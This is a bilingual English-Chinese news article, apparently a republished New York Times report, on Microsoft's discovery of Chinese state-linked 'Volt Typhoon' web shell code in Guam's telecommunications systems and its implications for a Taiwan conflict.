北京人民大会堂。电信网络是黑客的主要目标,关岛的系统对中国尤为重要。 Thibault Camus/Associated Press
Around the time that the F.B.I. was examining the equipment recovered from the Chinese spy balloon shot down off the South Carolina coast in February, American intelligence agencies and Microsoft detected what they feared was a more worrisome intruder: mysterious computer code appearing in telecommunications systems in Guam and elsewhere in the United States.
2月,美国在南卡罗来纳州海岸击落了中国的间谍气球,就在FBI对气球上的设备展开检查的前后,美国情报机构和微软发现了一个令他们更为担忧的入侵者:在关岛和美国其他地方的电信系统里,冒出神秘的计算机代码。
The code, which Microsoft said was installed by a Chinese government hacking group, raised alarms because Guam, with its Pacific ports and vast American air base, would be a centerpiece of any American military response to an invasion or blockade of Taiwan. The operation was conducted with great stealth, sometimes flowing through home routers and other common internet-connected consumer devices, to make the intrusion harder to track.
微软称,该代码是由一个中国政府黑客组织安装的,这引起了人们的警觉,因为关岛拥有太平洋港口和庞大的美国空军基地,如果台湾遭到入侵或封锁,那里将成为美国军事反应的核心。该行动非常隐蔽,有时通过家庭路由器和其他常见的消费类物联网设备进行,使入侵更加难以追踪。
The code is called a “web shell,” in this case a malicious script that enables remote access to a server. Home routers are particularly vulnerable, especially older models that have not had updated software and protections.
该代码称作“web shell后门”,这次发现的web shell是一个可以远程访问服务器的恶意脚本。家用路由器特别容易受到攻击,尤其是那些没有更新软件和防护措施的旧型号。
Unlike the balloon that fascinated Americans as it performed pirouettes over sensitive nuclear sites, the computer code could not be shot down on live television. So instead, Microsoft on Wednesday published details of the code that would make it possible for corporate users, manufacturers and others to detect and remove it. In a coordinated release, the National Security Agency — along with other domestic agencies and counterparts in Australia, Britain, New Zealand and Canada — published a 24-page advisory that referred to Microsoft’s finding and offered broader warnings about a “recently discovered cluster of activity” from China.
这与吸引美国人注意力的气球不同,气球在敏感的核设施上空旋转,而计算机代码无法被击落并进行电视直播。因此,微软周三公布了代码的详细信息,使企业用户、制造商和其他人能够进行检测并予以删除。国家安全局与其他国内机构,以及澳大利亚、英国、新西兰和加拿大的对应机构一起发布了一份长达24页的建议,将微软的发现公之于众,并对“最近发现的来自中国的一系列活动”提出了更广泛的警告。
Microsoft called the hacking group “Volt Typhoon” and said that it was part of a state-sponsored Chinese effort aimed at not only critical infrastructure such as communications, electric and gas utilities, but also maritime operations and transportation. The intrusions appeared, for now, to be an espionage campaign. But the Chinese could use the code, which is designed to pierce firewalls, to enable destructive attacks, if they choose.
微软称该黑客组织为“伏特台风”,并表示它属于中国政府支持的一项行动,它不仅针对通信、电力和天然气等关键基础设施,还针对海上作业和运输。目前看来,入侵似乎是一场间谍活动。但中国人有意为之的话,他们可以利用这些经过专门设计穿透防火墙的代码发起破坏性攻击。
So far, Microsoft says, there is no evidence that the Chinese group has used the access for any offensive attacks. Unlike Russian groups, the Chinese intelligence and military hackers usually prioritize espionage.
微软表示,到目前为止,没有证据表明该中国组织利用该访问权限进行了侵犯性攻击。与俄罗斯黑客组织不同,中国的情报和军事黑客通常将刺探情报放在首位。
In interviews, administration officials said they believed the code was part of a vast Chinese intelligence collection effort that spans cyberspace, outer space and, as Americans discovered with the balloon incident, the lower atmosphere.
政府官员在接受采访时表示,他们认为该代码是中国大规模情报收集工作的一部分,该工作涉及网络空间、外太空,以及美国人发现气球事件所涉及的低层大气层。
The Biden administration has declined to discuss what the F.B.I. found as it examined the equipment recovered from the balloon. But the craft — better described as a huge aerial vehicle — apparently included specialized radars and communications interception devices that the F.B.I. has been examining since the balloon was shot down.
拜登政府拒绝讨论FBI在热气球设备上发现了什么。但这艘飞行器——更确切地说是一个巨大的飞行器——显然包括专用雷达和通信拦截设备,自气球被击落以来联邦调查局一直在对它们进行检查。
It is unclear whether the government’s silence about its finding from the balloon is motivated by a desire to keep the Chinese government from knowing what the United States has learned or to get past the diplomatic breach that followed the incursion.
目前尚不清楚的是,政府对气球上的发现保持沉默究竟是出于不想让中国政府知道美国所获悉的情况,还是为了避开气球入侵事件后出现的外交裂痕。
On Sunday, speaking at a news conference in Hiroshima, Japan, President Biden referred to how the balloon incident had paralyzed the already frosty exchanges between Washington and Beijing.
周日,在日本广岛举行的一个新闻发布会上,拜登总统提到气球事件使华盛顿和北京之间本已冷淡的交流陷入瘫痪。
“And then this silly balloon that was carrying two freight cars’ worth of spying equipment was flying over the United States,” he told reporters, “and it got shot down, and everything changed in terms of talking to one another.”
“然后这个愚蠢气球携带着相当于两辆货车大小的间谍设备在美国上空飞行,”他告诉记者,“它被击落了,在对话方面,一切都变了。”
He predicted that relations would “begin to thaw very shortly.”
他预测,两国关系将“很快开始解冻”。
对关岛的关注尤其引起了一些官员们的注意,他们正在评估中国进攻或封锁台湾的能力以及意愿。 Chang W. Lee/The New York Times
China has never acknowledged hacking into American networks, even in the biggest example of all: the theft of security clearance files of roughly 22 million Americans — including six million sets of fingerprints — from the Office of Personnel Management during the Obama administration. That exfiltration of data took the better part of a year, and resulted in an agreement between President Barack Obama and President Xi Jinping that resulted in a brief decline in malicious Chinese cyberactivity.
中国从未承认侵入美国网络,即使在规模最大的一起事件中也是如此:在奥巴马政府期间,人事管理局大约2200万美国人的安全审查文件被盗,其中包括600万组指纹。数据外泄的过程持续了将近一年,并促使奥巴马总统和习近平主席达成协议,此后中国恶意网络活动短暂下降。
On Wednesday, China sent a warning to its companies to be alert to American hacking. And there has been plenty of that, too: In documents released by Edward Snowden, the former N.S.A. contractor, there was evidence of American efforts to hack into the systems of Huawei, the Chinese telecommunications giant, and military and leadership targets.
周三,中国向国内企业发出警告,要求警惕美国的黑客行为。美国针对中国的黑客行为也不少:在前国家安全局承包商斯诺登公布的文件中,有证据表明,美国曾试图侵入中国电信巨头华为的系统,以及军事和领导层目标。
Telecommunications networks are key targets for hackers, and the system in Guam is particularly important to China because military communications often piggyback on commercial networks.
电信网络是黑客的主要目标,关岛的这个系统对中国来说尤其重要,因为军事通信经常借用商业网络。
Tom Burt, the executive who oversees Microsoft’s threat intelligence unit, said in an interview that the company’s analysts — many of them veterans of the National Security Agency and other intelligence agencies — had found the code “while investigating intrusion activity impacting a U.S. port.” As they traced back the intrusion, they found other networks that were hit, “including some in the telecommunications sector in Guam.”
负责微软威胁情报部门的主管汤姆·伯特在采访中说,该公司的分析人员——其中许多是国家安全局和其他情报机构的资深人士——“在调查影响一个美国港口的入侵活动时”发现了这些代码。在追踪入侵过程时,他们发现了其他遭到攻击的网络,“包括关岛电信部门的一些网络”。
Anne Neuberger, the deputy national security adviser for cyber and emerging technology, said that covert efforts “like the activity exposed today are part of what’s driving our focus on the security of telecom networks and the urgency to use trusted vendors” whose equipment has met established cybersecurity standards.
负责网络和新兴技术的副国家安全顾问安妮·纽伯格表示,“像今天曝光的活动这样的秘密行动是促使我们关注电信网络安全、使用可靠供应商的紧迫性的部分原因”,这些供应商的设备符合既定的网络安全标准。
Ms. Neuberger has been spearheading an effort across the federal government to enforce new cybersecurity standards for critical infrastructure. Officials were taken by surprise by the extent of the vulnerabilities in such infrastructure when a Russian ransomware attack on Colonial Pipeline in 2021 interrupted gasoline, diesel and airplane fuel flow on the East Coast. In the wake of the attack, the Biden administration used little-known powers of the Transportation Security Administration — which regulates pipelines — to force private-sector utilities to follow a series of cybersecurity mandates.
纽伯格一直牵头在整个联邦政府推行针对关键基础设施的新网络安全标准。2021年,俄罗斯对科洛尼尔管道运输公司发起的勒索软件攻击中断了美国东岸的汽油、柴油和飞机燃料供应,令官员们对这些基础设施的脆弱感到惊讶。袭击发生后,拜登政府利用负责监管管道的运输安全管理局鲜为人知的权力,迫使私营的公用事业部门遵守一系列网络安全指令。
Now Ms. Neuberger is driving what she called a “relentless focus on improving the cybersecurity of our pipelines, rail systems, water systems and other critical services,” including the mandates on cybersecurity practices for these sectors and closer collaboration with companies with “unique visibility” into threats to such infrastructure.
现在,纽伯格正在推动她所说的“对改善我们管道、铁路系统、供水系统和其他关键服务的网络安全的不懈关注”,包括对这些部门的网络安全做法提出要求,并与对这些基础设施面临的威胁具有“独特可见性”的公司展开更密切合作。
Those firms include Microsoft, Google, Amazon, and many telecommunications firms that can see activity on domestic networks. Intelligence agencies, including the N.S.A., are forbidden by law from operating inside the United States. But the N.S.A. is permitted to publish warnings, as it did on Wednesday, alongside the F.B.I. and the Department of Homeland Security’s Cyber Infrastructure and Security Administration.
这些公司包括微软、谷歌、亚马逊和许多可以看到国内网络活动的电信公司。法律禁止包括国家安全局在内的情报机构在美国境内开展活动。但国家安全局被允许发布警告,正如在周三所做的那样,它与联邦调查局和国土安全部下属的网络基础设施与安全管理局一起发布了警告。
The agency’s report is part of a relatively new U.S. government move to publish such data quickly in hopes of burning operations like the one mounted by the Chinese government. In years past, the United States usually withheld such information — sometimes classifying it — and shared it with only a select few companies or organizations. But that almost always assured that the hackers could stay well ahead of the government.
该机构的这份报告是美国政府迅速公布此类数据的相对较新举措的一部分,希望能阻止中国政府发起的类似行动。在过去的几年里,美国通常会隐瞒这些信息(有时还会将其归入保密级别),并且只与少数公司或组织分享。但这几乎总令黑客远远领先于政府。
In this case, it was the focus on Guam that particularly seized the attention of officials who are assessing China’s capabilities — and its willingness — to attack or choke off Taiwan. Mr. Xi has ordered the People’s Liberation Army to be capable of taking the island by 2027. But the C.I.A. director, William J. Burns, has noted to Congress that the order “does not mean he has decided to conduct an invasion.”
在这种情况下,对关岛的关注尤其引起了一些官员们的注意,他们正在评估中国攻击或扼杀台湾的能力和意愿。习近平命令人民解放军要在2027年之前有能力拿下该岛。但中情局局长伯恩斯向国会指出,该命令“并不意味着他已经决定发动入侵”。
In the dozens of U.S. tabletop exercises conducted in recent years to map out what such an attack might look like, one of China’s first anticipated moves would be to cut off American communications and slow the United States’ ability to respond. So the exercises envision attacks on satellite and ground communications, especially around American installations where military assets would be mobilized.
近年来,美国进行了数十次战棋推演,以便对这种攻击中可能出现的情况加以筹划,中国的首批预期动作之一将是切断美国的通信,拖延美国的反应能力。因此,演习设想了对卫星和地面通信的攻击,特别是在将调动军事资产的美国军事设施周围。
None is bigger than Guam, where Andersen Air Force Base would be the launching point for many of the Air Force missions to help defend the island, and a Navy port is crucial for American submarines.
其中最重要的就是关岛,为帮助保卫台湾,那里的安德森空军基地将是美国空军许多任务的发射点,而那里的一个海军港口对美国潜艇来说至关重要。
David E. Sanger是白宫和国家安全记者。他在时报任职38年,参与的三个团队获得了普利策奖,最近一次是在2017年获得国际报道奖。他最新出版的一本书是《完美武器:网络时代的战争、破坏和恐惧》(The Perfect Weapon: War, Sabotage and Fear in the Cyber Age) 。欢迎在Twitter和Facebook上关注他。
翻译:纽约时报中文网
点击查看本文英文版。
纳闻|真实新闻与历史–「中英」中国黑客入侵关岛电信系统,台湾或为真正目标?